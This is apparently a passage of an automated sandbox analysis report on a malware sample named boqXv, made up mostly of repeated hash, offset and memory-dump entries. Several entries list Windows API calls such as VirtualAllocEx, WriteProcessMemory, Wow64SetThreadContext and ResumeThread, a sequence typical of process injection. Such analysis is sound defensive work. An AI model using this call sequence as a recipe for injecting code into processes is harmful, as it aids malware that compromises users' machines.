                                                • Instruction ID: 40da4221796bf7ca11e48dd34d5ef5a1c1df10312538ff7dd2c52d3ee8f4867e
                                                • Opcode Fuzzy Hash: 3e0542754a7669478d9c781d7b0222b58e16bdf29fb363371e5c3abb1655140b
                                                • Instruction Fuzzy Hash: 6B2108B1A14315DBF7148B69D9803FAB6A5FBC2359F048F3BE0A6C6191E63CD940C211
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: 560adfc39f75b35b5e6d887a568797d16b41405691adf2943ed68554dff8fd96
                                                • Instruction ID: c6b5b103448e1e808278caf4f335ff72a7f250572c62013825f6fb6297fd03a8
                                                • Opcode Fuzzy Hash: 560adfc39f75b35b5e6d887a568797d16b41405691adf2943ed68554dff8fd96
                                                • Instruction Fuzzy Hash: 2581B274B00208EFEB14CB64C959BBD7BA2FBC5781F108D66E542AB394EB718C40CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: b03a60ff06f916fe25a4ce0e452b5c1347f6e53a2bbfc73917878cf929df54b2
                                                • Instruction ID: 0fec879302f0a13885e97ba134385b55919756c3c05da6152a75c996df1be47c
                                                • Opcode Fuzzy Hash: b03a60ff06f916fe25a4ce0e452b5c1347f6e53a2bbfc73917878cf929df54b2
                                                • Instruction Fuzzy Hash: 4F61BF74B40208EFEB14CA79C959BAD7AA3FBC4741F108966E542AF394EB718C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq
                                                • API String ID: 0-1276831224
                                                • Opcode ID: 474197b38f2a026b70e39134a073d38ad5bdeceac2030cb85b8579fcb16fb605
                                                • Instruction ID: 85acbae20162710943f5e7736e1586ca13ef8b8b1840342da8120deb97f7210f
                                                • Opcode Fuzzy Hash: 474197b38f2a026b70e39134a073d38ad5bdeceac2030cb85b8579fcb16fb605
                                                • Instruction Fuzzy Hash: 262124B261821AFBF7206A29950077A77A5E7C6392F408F36E48597280E738DC51DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 26141644a78386ab87d75c531668281a16a6ff70b7974fab4dc24640dd0b15b8
                                                • Instruction ID: 5f215df683b5ef6d499f90b84f152ebf63f5abb3675282733d262654a7e77138
                                                • Opcode Fuzzy Hash: 26141644a78386ab87d75c531668281a16a6ff70b7974fab4dc24640dd0b15b8
                                                • Instruction Fuzzy Hash: F22139B0E15209EFDB44CFAAC940AAEFBF1FF99340F14C5AA9508E7214E7309A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 032B7D2E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 08e24f98effa605fa3d953c8b908ddd185e65fc806cfa59f5ea4c5a326083fae
                                                • Instruction ID: 31f25afdfa8442e93d66258c9c94f9bc233b06728588774faeb7a8518df19656
                                                • Opcode Fuzzy Hash: 08e24f98effa605fa3d953c8b908ddd185e65fc806cfa59f5ea4c5a326083fae
                                                • Instruction Fuzzy Hash: 4FA16B71D1021ADFDB10CF68C841BEDBBB2BF84354F1885AAE849A7280DB7499C5CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 032B7D2E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7440536e3f2a862667bd8fa6fa0b245b9d104325a0fdaad3e1916bf24dc9d60f
                                                • Instruction ID: 65c1fc4e5d6204f872db8c5cccd848b69eb28d81efb1e6606c4789049f2200e5
                                                • Opcode Fuzzy Hash: 7440536e3f2a862667bd8fa6fa0b245b9d104325a0fdaad3e1916bf24dc9d60f
                                                • Instruction Fuzzy Hash: 37916B71D1021ADFDB10CF68C841BEDBBB2BF88354F1885A9E849A7280DB7499C5CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016DAF56
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a5b48edcc7f7b14720e97cd43824c7cdbf23e5e0113d25fe2b4146da8f939d04
                                                • Instruction ID: 34e3e579515f3af045f49223e4c188122c7167f9f1173d81eb5d987e37f98d15
                                                • Opcode Fuzzy Hash: a5b48edcc7f7b14720e97cd43824c7cdbf23e5e0113d25fe2b4146da8f939d04
                                                • Instruction Fuzzy Hash: CA7111B0A00B058FDB24DF6AC84475ABBF6BF88300F00892DD48A97B50DB75E949CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: db0afdb9865227264f0cb9b42e496a4e54b9959dc3851f3873d1741bccccc40d
                                                • Instruction ID: a3281d7b32dc6d2fd72bbf7bfaaad40d69b31d20eb90cc37b108c250d58953e9
                                                • Opcode Fuzzy Hash: db0afdb9865227264f0cb9b42e496a4e54b9959dc3851f3873d1741bccccc40d
                                                • Instruction Fuzzy Hash: B641C2B0C00729CFDB24DFAAC884BDEBBB5BF49304F24806AD409AB255DB756945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 05ce3ec4b3404c14713d6beca5695eabb92dd4825d722d8c61a277fa7e9802eb
                                                • Instruction ID: 975a03cb1b1f3f5205a7bb38bde4d0b7e1d088b1b951a192737b5c7b0462c21f
                                                • Opcode Fuzzy Hash: 05ce3ec4b3404c14713d6beca5695eabb92dd4825d722d8c61a277fa7e9802eb
                                                • Instruction Fuzzy Hash: B441D1B0C00729CFDB24CFAAC884BDDBBB5BF49304F24806AD409AB255DB756946CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016DD367
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: dad2096446422909d6f865ea2c018d7c0adb2b6ed1d40e213dc4809e0286a70c
                                                • Instruction ID: d8a3d658b339e2e988f589db74fa51499f4e83537b45dbc129e24d5cca4b89f1
                                                • Opcode Fuzzy Hash: dad2096446422909d6f865ea2c018d7c0adb2b6ed1d40e213dc4809e0286a70c
                                                • Instruction Fuzzy Hash: BF314D79A403408FF7249FA0F95976A3BBAF788360F518069F9058B3D8DEB65901CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 032B7900
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 11f714beae5090c303f4d400c56d5de9860cc111c874301dab37932a7493ef45
                                                • Instruction ID: 045301e245335ac4603c780a664f09adf8501256c95a6db631c69983926fa8fd
                                                • Opcode Fuzzy Hash: 11f714beae5090c303f4d400c56d5de9860cc111c874301dab37932a7493ef45
                                                • Instruction Fuzzy Hash: 63215AB19003599FCB10DFA9C841BDEBBF0FF48350F108429E959A7251C7749954CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 032B79E0
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 032B7900
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 032B7756
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 032B79E0
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 032B7756
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016DD367
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016DD367
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 032B781E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3D1,00000800,00000000,00000000), ref: 016DB5C2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 032B781E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3D1,00000800,00000000,00000000), ref: 016DB5C2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016DAF56
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 032BB0BD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 032BB0BD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5
                                                • API String ID: 0-3899204960
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a73749b8ecb4c409bf3922bdf0f111011acf3c77bd1e7778d198ed4d1dae6cf7
                                                • Instruction ID: 59b3e07cf1fdcdf30b450f50814c20c2354514907ae6ecc90baf3925048e2b13
                                                • Opcode Fuzzy Hash: a73749b8ecb4c409bf3922bdf0f111011acf3c77bd1e7778d198ed4d1dae6cf7
                                                • Instruction Fuzzy Hash: D551D2F0A18215EBEB14CF69C8416BEBBB1FBC6395F048727E5669B281D738D940CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21ebe9c0ea724811647ca05cdda02d8fb06056792f69271918eb8ae3ebdb8001
                                                • Instruction ID: 99ea016c21a390885489640b1c77d4ce17e1d82713f50d4bcdae634df6a1c676
                                                • Opcode Fuzzy Hash: 21ebe9c0ea724811647ca05cdda02d8fb06056792f69271918eb8ae3ebdb8001
                                                • Instruction Fuzzy Hash: 2D41ADB89197889FD706CB6AD440848BFB0EF8A215F1A85D7D4C4DB3A3D7349949CB12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c246d42dcb09f0c65d4288ebacec057a5cbcb48468b56ec8a154bbdb098d7f05
                                                • Instruction ID: 1f38e3e73e10b602d14b0392b4158e39b157df2c67e62a405d6db99043203e75
                                                • Opcode Fuzzy Hash: c246d42dcb09f0c65d4288ebacec057a5cbcb48468b56ec8a154bbdb098d7f05
                                                • Instruction Fuzzy Hash: C9419FB4E0420AEFDB05CFA5D8419EEBBB2FBC9310F14952AE505AB350D7709A51CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9667360cbda072c77f8566df46dc85c0c379f647c21a7dbc05717aec2d697e2
                                                • Instruction ID: 87c969d492c2688496ed8a753e7ad6e9c2ed193696fc5a88294ec5a134447140
                                                • Opcode Fuzzy Hash: c9667360cbda072c77f8566df46dc85c0c379f647c21a7dbc05717aec2d697e2
                                                • Instruction Fuzzy Hash: 21419FB5914609EFEB10CF68C4857AAB7B1FFC5340F104726E566972A3D334D8A18B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3aead28214280e3f0fc0c20ff8dfe35976b7eadf0bffeb13026507271e0047c7
                                                • Instruction ID: 883789757be4d90d1cb6e865b166b118bb34453aaec7d5ba6e058688467f2171
                                                • Opcode Fuzzy Hash: 3aead28214280e3f0fc0c20ff8dfe35976b7eadf0bffeb13026507271e0047c7
                                                • Instruction Fuzzy Hash: 11415DB4E1020AEFDB44CF95D8419EEBBB2FB89350F109529D505AB354D7709A51CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5697d8209eb4347ba14f9fc5c89a77b936dcbd2fd8cff0a9c976f573a47a4aa6
                                                • Instruction ID: 4dc049b859d1ffdf8c71eaaa6fc61fab6fad66b5c7dedfc819897dad7b128155
                                                • Opcode Fuzzy Hash: 5697d8209eb4347ba14f9fc5c89a77b936dcbd2fd8cff0a9c976f573a47a4aa6
                                                • Instruction Fuzzy Hash: 80316DB6900219EFDB10DFA9D944ADEBFF5EF88350F10852AE405E7250D730A940CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e21d8736ddee1b86000f904ca7dc92b27407738a13119114c8eb993a96b17a09
                                                • Instruction ID: fe4b2f29e192efe8127ae781e154a6920e90ea4b03544694a19e3eb3d6b7d8e7
                                                • Opcode Fuzzy Hash: e21d8736ddee1b86000f904ca7dc92b27407738a13119114c8eb993a96b17a09
                                                • Instruction Fuzzy Hash: 053127B0B44201AFFB149A64AC0AB757B63BBC6355F19C6BAF0458F2C2DBB6C801C710
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e502c981ad89da3484447c76b006ebb99da9262373b9ac796a9b02587344cdf8
                                                • Instruction ID: 398828b1a61883f2dbd599a49621e2851ce747639f417d20e387fbc7a7ce86b6
                                                • Opcode Fuzzy Hash: e502c981ad89da3484447c76b006ebb99da9262373b9ac796a9b02587344cdf8
                                                • Instruction Fuzzy Hash: 1A3128F4915112FBE3004F54D4803B9B7B2FBC3399F198B76E4698B282C63AC841CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c3ce1aa2a57dc981dfb7c4adaa94f42f9bb4e2c03a595eae6f32a742de2352e
                                                • Instruction ID: 1f1f95000a7b656ddf1fa403f5fb25717dca2143a37bdf43483080df729a4e9b
                                                • Opcode Fuzzy Hash: 5c3ce1aa2a57dc981dfb7c4adaa94f42f9bb4e2c03a595eae6f32a742de2352e
                                                • Instruction Fuzzy Hash: 01210471504204DFDB05DF98D9C4B26BBA5FF84328F24C96DE9094B396C336E846CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
